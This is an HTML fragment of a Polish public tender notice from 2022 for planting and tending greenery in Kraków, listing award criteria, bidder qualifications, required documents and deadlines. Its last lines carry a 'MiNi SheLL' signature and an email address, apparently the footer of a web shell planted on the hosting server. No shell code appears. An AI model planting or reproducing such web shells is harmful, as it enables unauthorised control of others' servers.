poniższych warunków - Oferta otrzyma maksymalnie 10 punktów, według poniższych zasad:<br/>1)	jeżeli wykonawca zadeklaruje niestosowanie chemicznych środków ochrony roślin i całkowite ich zastąpienie metodami alternatywnymi – przyznane punkty (ŚCh) – 10 punktów<br/>2)	jeżeli wykonawca nie zadeklaruje niestosowania chemicznych środków ochrony roślin i całkowitego ich zastąpienia metodami alternatywnymi - przyznane punkty (ŚCh) – 0 punktów.<br/>W przypadku zadeklarowania przez Wykonawcę niestosowania chemicznych środków ochrony roślin i całkowitego zastąpienia ich alternatywnymi rozwiązaniami Zamawiający przyzna max liczbę punktów w kryterium „Niestosowanie chemicznych środków ochrony roślin (ŚCh)”.<br/><br/>7. Pozostałe informacje zawarto w rozdz. XIX SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty środowiskowe, w tym efektywność energetyczna przedmiotu zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">„Dostarczanie roślin ozdobnych wyprodukowanych metodami ekologicznymi (RE)”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty środowiskowe, w tym efektywność energetyczna przedmiotu zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Stosowanie ulepszaczy gleby spełniających kryteria unijne zielonych zamówień (UG)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty środowiskowe, w tym efektywność energetyczna przedmiotu zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Niestosowanie chemicznych środków ochrony roślin (ŚCh)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z przyczyn wskazanych w Rozdziale IX SWZ oraz spełniają określone poniżej przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie,<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie,<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie,<br/><br/>4)	zdolności technicznej lub zawodowej:<br/><br/>O udzielenie zamówienia może ubiegać się Wykonawca, który wykaże, że spełnia łącznie poniższe warunki: <br/><br/>A.	posiada niezbędną wiedzę i doświadczenie, tj.<br/><br/>w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie i prawidłowo co najmniej jedną usługę (umowę) polegającą na:<br/><br/>dostawie i sadzeniu drzew lub krzewów lub bylin lub pielęgnacji drzew o wartości usługi (umowy) nie mniejszej niż 100 000,00 PLN brutto (słownie: sto tysięcy złotych)<br/><br/>a także <br/>potwierdził, że usługi zostały wykonane zgodnie z zasadami sztuki ogrodniczej i prawidłowo ukończone.<br/><br/>B.	dysponuje osobami zdolnymi do realizacji zamówienia:<br/><br/>1)	posiadającą wykształcenie wyższe kierunkowe w zakresie ogrodnictwa lub leśnictwa lub rolnictwa lub architektury krajobrazu oraz posiadającą co najmniej trzyletnią praktykę zawodową w zakresie odpowiadającym wykształceniu <br/>lub<br/>2)	legitymująca się tytułem co najmniej mgr inż. architektury krajobrazu lub co najmniej mgr inż. ogrodnictwa i posiadająca co najmniej 12-miesięczne doświadczenie w pracach konserwatorskich lub pracach restauratorskich prowadzonych przy zabytkach stanowiących zorganizowaną zieleń wpisaną do rejestru, lub która była zatrudniona przy pracach w muzeum będącym instytucją kultury<br/>lub<br/>3)	będąca ogrodnikiem lub leśnikiem posiadającym wykształcenie średnie lub wyższe oraz co najmniej dwuletnią praktykę zawodową w zakresie odpowiadającym wykształceniu.<br/><br/>3.	Warunek udziału w postępowaniu dotyczący niezbędnej wiedzy i doświadczenia, musi być spełniony: <br/>1)	przez Wykonawcę samodzielnie, lub<br/>2)	przez minimum jeden podmiot udostępniający wiedzę i doświadczenie (podwykonawcę) samodzielnie, a w przypadku podmiotów występujących wspólnie, samodzielnie przez minimum jednego z Wykonawców występujących wspólnie.<br/>4.	Wymagania Zamawiającego dotyczące zatrudnienia przez Wykonawcę lub podwykonawcę osób na podstawie Umowy o pracę (art. 95 ust. 1 ustawy Pzp).<br/>1)	Stosownie do treści art. 95 ust. 2 ustawy Pzp Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę, osób wykonujących następujące czynności w zakresie realizacji zamówienia: <br/>a)	Czynności związane z realizacją zamówienia w zakresie prac fizycznych.<br/>Wykonawca zobowiązuje się, aby wszyscy pracownicy wykonujący czynności, o których mowa w lit. a) byli przez cały okres realizacji przedmiotu zamówienia zatrudnieni na podstawie umowy o pracę w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy, zgodnie z oświadczeniem ujętym w treści Formularza Ofertowego, którego wzór stanowi Załącznik nr 2 do SWZ.<br/>2)	Szczegółowe warunki dotyczące sposobu dokumentowania zatrudnienia osób oraz inne wymagania w tym zakresie Zamawiający ujął w § 8 wzoru Umowy stanowiącego Załącznik nr 1 do SWZ.<br/>5.	Zamawiający nie wymaga zatrudnienia na Umowę o pracę kierowców pojazdów oraz osób sprawujących nadzór nad prowadzonymi pracami.<br/>6.	W celu potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawca może polegać na potencjale podmiotu trzeciego na zasadach opisanych w art. 118–123 Pzp. Podmiot trzeci, na potencjał którego Wykonawca powołuje się w celu wykazania spełnienia warunków udziału <br/>w postępowaniu, nie może podlegać wykluczeniu z postępowania. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5) Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej (wzór oświadczenia stanowi Załącznik Nr 4 do SWZ); oświadczenie nie będzie wymagane w przypadku złożenia w postępowaniu tylko jednej oferty.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	Wykaz usług wykonanych przez Wykonawcę, dotyczący usług wykonanych nie wcześniej niż, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, z załączeniem dowodów określających czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy.<br/><br/>Propozycja sposobu przedłożenia w/w dokumentów została zawarta w Załączniku Nr 5 do SWZ - Wykaz wykonywanych przez Wykonawcę usług.<br/><br/>2)	Dowody potwierdzające posiadanie przez osobę, o której mowa w Rozdz. XI pkt 2 lit B SWZ (która zostanie skierowana przez Wykonawcę do pełnienia nadzoru nad realizacją przedmiotu zamówienia) wymaganego wykształcenia i doświadczenia zawodowego.<br/><br/>Zamawiający wprowadził warunki udziału zawarte w SWZ w jej pierwszej części – w Rozdziale XI pkt 2 lit. B.<br/><br/>Na potwierdzenie wymaganego wykształcenia wymagane jest złożenie kopii stosownych dokumentów. Na potwierdzenie doświadczenia zawodowego Zamawiający dopuszcza oświadczenie osoby, której dotyczy wymóg, kontrasygnowane przez Wykonawcę.<br/><br/>Dokumenty ujęte w pkt 1) składa (jeżeli dotyczy) podmiot, na którego zasoby powołuje się Wykonawca w celu spełnienia warunków udziału w postępowaniu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.1	Wymogi podstawowe:<br/>1)	Wymóg:	<br/>1.	stosowanie do dostarczanych roślin wyłącznie opakowań biodegradowalnych (w przypadku opakowań jednorazowych) lub opakowań wielokrotnego użytku	<br/>2) wymagane dokumenty:<br/>•	oświadczenie Wykonawcy, że odbierze pojemniki wielokrotnego użytku z terenu wykonywania prac;<br/>•	w przypadku pojemników ulegających biodegradacji (o ile ich zastosowanie Wykonawca zadeklaruje w pkt. 6 Formularza Ofertowego) - wykaz składników produktu oraz ich odpowiednich udziałów procentowych oraz oświadczenie, że wymogi specyfikacji zostały spełnione;<br/>Pojemniki na rośliny opatrzone oznakowaniem ekologicznym typu I, spełniającym wyszczególnione wymagane kryteria, zostaną uznane za zgodne z wymogami, podobnie jak produkty sklasyfikowane jako ulegające biodegradacji i nadające się do kompostowania zgodnie z normą EN 13432:2000 lub równoważną; uznany zostanie również każdy inny stosowny środek dowodowy. Zamawiający uzna, że opakowanie spełnia kryteria jeżeli jest oznakowane „Błękitnym aniołem” (Blue Angel).<br/>2) Wymóg:<br/>1.	dostarczanie roślin niewielkich rozmiarów w zwrotnych pojemnikach	<br/>2. wymagane dokumenty:<br/>oświadczenie Wykonawcy, że rośliny niewielkich rozmiarów będą dostarczane w zwrotnych skrzyniach kratowych lub skrzynkach, które zostaną przez Wykonawcę zabrane z terenu, na którym wykonywany będzie przedmiot zamówienia<br/>3) Wymóg:<br/>1.	stosowanie polepszaczy gleby niezawierających torfu ani osadów ściekowych	<br/>2. Wymagane dokumenty:<br/>•	dokument określający szczegółowy skład produktu oraz pochodzenie materii organicznej<br/>•	deklaracja zgodności z wyszczególnionymi wyżej wymogami.<br/>Produkty opatrzone oznakowaniem ekologicznym typu I, spełniające wymagane kryteria, zostaną uznane za spełniające wymogi. Uznane zostaną również inne odpowiednie środki dowodowe, takie jak dokumentacja techniczna producenta lub sprawozdanie z badań przeprowadzonych przez uznany organ.<br/>--------------------------------------------------------------------------<br/>1.2 Wymogi dodatkowe:<br/>1) Wymóg:<br/>1.	dostarczenie roślin ozdobnych wyprodukowanych metodami ekologicznymi	<br/>2. wymagane dokumenty*:	<br/>oświadczenie Wykonawcy, że wskazane przez niego rośliny, które zamierza nasadzić w ramach przedmiotu Umowy, zostały wyprodukowane metodami ekologicznymi zgodnie z rozporządzeniem Wspólnoty Europejskiej nr 834/2007 w sprawie produkcji ekologicznej i znakowania produktów ekologicznych i uchylające rozporządzenie (EWG) nr 2092/91<br/>2). Wymóg:<br/>1. stosowanie ulepszaczy gleby spełniających kryteria unijne zielonych zamówień (UWAGA: szczegółowe wymogi określono w L.p. 3 tabeli ujętej w części II Załącznika Nr 2 do Wzoru Umowy, kolumna „Specyfikacje techniczne”)<br/>2. wymagane dokumenty*:<br/>W odniesieniu do substancji organicznych i osadów:<br/>•	dokument, z którego będzie wynikać szczegółowy skład produktu, pochodzenie materii organicznej<br/>•	deklaracja zgodności z wyszczególnionymi w kolumnie specyfikacje techniczne wymogami.<br/>Produkty opatrzone oznakowaniem ekologicznym typu I, spełniające wymienione kryteria, zostaną uznane za spełniające wymogi. Uznane zostaną również inne odpowiednie środki dowodowe, takie jak dokumentacja techniczna producenta lub sprawozdanie z badań przeprowadzonych przez uznany organ. <br/>W odniesieniu do stężenia metali ciężkich:<br/>•	sprawozdania z badań (EN 13650, ISO 16772 lub norma równoważna), wykazujące, że kryterium jest spełnione.<br/>Produkty opatrzone oznakowaniem ekologicznym typu I, spełniające wymienione kryteria, zostaną uznane za spełniające wymogi. Uznane zostaną również inne odpowiednie środki dowodowe, takie jak dokumentacja techniczna producenta lub sprawozdanie z badań przeprowadzonych przez uznany organ.<br/>3)	Wymóg:<br/>1. niestosowanie chemicznych środków ochrony roślin	<br/>2. wymagane dokumenty*:<br/>•	oświadczenie Wykonawcy, że do realizacji usługi nie będzie stosował chemicznych środków ochrony roślin.<br/>* UWAGA: obowiązują tylko te dokumenty, co do których Wykonawca zadeklarował w Ofercie spełnianie danego wymogu dodatkowego. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1.	Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie (dotyczy sytuacji, gdy przedmiotowe środki dowodowe są wymagane).<br/>2.	Postanowień ust. 2 nie stosuje się, jeżeli przedmiotowy środek dowodowy służy potwierdzaniu zgodności z cechami lub kryteriami określonymi w opisie kryteriów oceny ofert lub, pomimo złożenia przedmiotowego środka dowodowego, oferta podlega odrzuceniu albo zachodzą przesłanki unieważnienia postępowania. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Do przygotowania oferty zaleca się wykorzystanie Formularza Oferty z Formularzem Cenowym, którego wzór stanowi Załącznik Nr 2 do SWZ. W przypadku, gdy Wykonawca nie korzysta z przygotowanego przez Zamawiającego wzoru, w treści oferty należy zamieścić wszystkie informacje wymagane w Formularzu Ofertowym. <br/>2.	Do oferty należy dołączyć: <br/>1)	dokumenty potwierdzające spełnienie przez oferowane usługi wymogów podstawowych (szczegółowo opisane w Załączniku Nr 2 do Wzoru Umowy, stanowiącego Załącznik Nr 1 do SWZ) ujętych w Rozdz. XII ust. 5 pkt.1) (przedmiotowe środki dowodowe);<br/>2)	dokumenty potwierdzające spełnienie przez oferowane usługi wymogów dodatkowych (szczegółowo opisane w Załączniku Nr 2 do Wzoru Umowy, stanowiącego Załącznik Nr 1 do SWZ ujętych w Rozdz. XII ust. 5 pkt.2) (przedmiotowe środki dowodowe);<br/>UWAGA: obowiązują tylko te dokumenty, co do których Wykonawca zadeklarował w Ofercie spełnianie danego wymogu dodatkowego<br/>3)	pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>4)	pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia; <br/>5)	oświadczenie Wykonawcy/każdego z Wykonawców wspólnie ubiegającego się o udzielenie zamówienia/ podmiotu udostępniającego swoje zasoby (jeżeli dotyczy) o niepodleganiu wykluczeniu z postępowania oraz o spełnianiu warunków udziału w postępowaniu - wzór oświadczenia stanowi Załącznik Nr 3 do SWZ;<br/>6)	zobowiązanie podmiotu udostępniającego zasoby (na zasadach określonych w art. 118 ustawy Pzp ) zgodnie z Rozdz. XI ust. 6 – 9 SWZ (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia (np. spółki cywilne, konsorcja), zgodnie z art. 58 ust. 2 Pzp, zobowiązani są ustanowić pełnomocnika. Z treści pełnomocnictwa winno jednoznacznie wynikać prawo pełnomocnika do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w imieniu Wykonawcy. Dokument ten winien być podpisany przez osobę/osoby uprawnioną (-e) do jego udzielenia, tj. zgodnie z formą reprezentacji każdego z Wykonawców (podpisany kwalifikowanym podpisem elektronicznym lub profilem zaufanym lub podpisem osobistym). W przypadku wspólników spółki cywilnej dopuszczalne jest przedłożenie umowy spółki cywilnej, z której wynika zakres i sposób reprezentacji, a w przypadku konsorcjum przedłożenie umowy konsorcjum. Pełnomocnictwo winno być załączone do oferty. Korespondencja w sprawie zamówienia publicznego będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem ustanowionym przez Wykonawców wspólnie ubiegających się o udzielenie tego zamówienia.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia/podmiotu udostępniającego swoje zasoby wykonawcy, oświadczenia, o których mowa w art. 125 ust. 1 Pzp składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający oświadcza, że przewiduje możliwość wprowadzenia zmian do Umowy na etapie realizacji przedmiotu Umowy zgodnie z przepisem art. 455 ust. 1 pkt 2) – 4) oraz art. 455 ust. 2 ustawy Pzp,<br/>a także – zgodnie z przepisem art. 455 ust. 1 pkt 1) ustawy Pzp – w przypadku wystąpienia co najmniej jednej z wymienionych w niniejszym paragrafie okoliczności oraz określa warunki zmian Umowy w ust. 2 – 18 niniejszego paragrafu. <br/><br/>Szczegółowe zmiany dotyczące rodzaju i zakresu przedmiotu Umowy zostały określone w ust. 2 - 18 paragrafu 16. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-14 08:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-14 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zaleca się, aby Wykonawca zdobył, na własną odpowiedzialność i ryzyko, wszelkie potrzebne informacje, które mogą być konieczne do przygotowania oferty oraz zawarcia Umowy i wykonania zamówienia. Zamawiający informuje Wykonawców o ich uprawnieniu do przeprowadzenia wizji lokalnej planowanych usług. Wizja lokalna nie jest obowiązkowa. Koszt dokonania wizji lokalnej planowanych usług poniesie Wykonawca. Wykonawca może skorzystać z wizji lokalnej, która została zaplanowana w terminie: 08 lipca 2022 r. o godzinie 11.00<br/>miejsce wizji lokalnej: Kraków, ul. Helclów 2<br/><br/>2.	Przed zawarciem umowy:<br/>1)	Wykonawca wniesie zabezpieczenie należytego wykonania umowy, o którym mowa w Rozdziale XX SWZ;<br/>2)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w przypadku wyboru ich oferty jako najkorzystniejszej) przedstawią Zamawiającemu umowę regulującą współpracę tych Wykonawców;<br/>3)	Wykonawca zobowiązuje się dostarczyć polisę ubezpieczeniową z tytułu odpowiedzialności cywilnej w związku z prowadzoną działalnością gospodarczą do dnia zawarcia Umowy pomiędzy Stronami - zgodnie z zapisami § 15 Wzoru Umowy stanowiącego Załącznik Nr 1 do SWZ, na sumę ubezpieczenie nie mniejszą niż 100 000,00 zł.

Creat By MiNi SheLL
Email: jattceo@gmail.com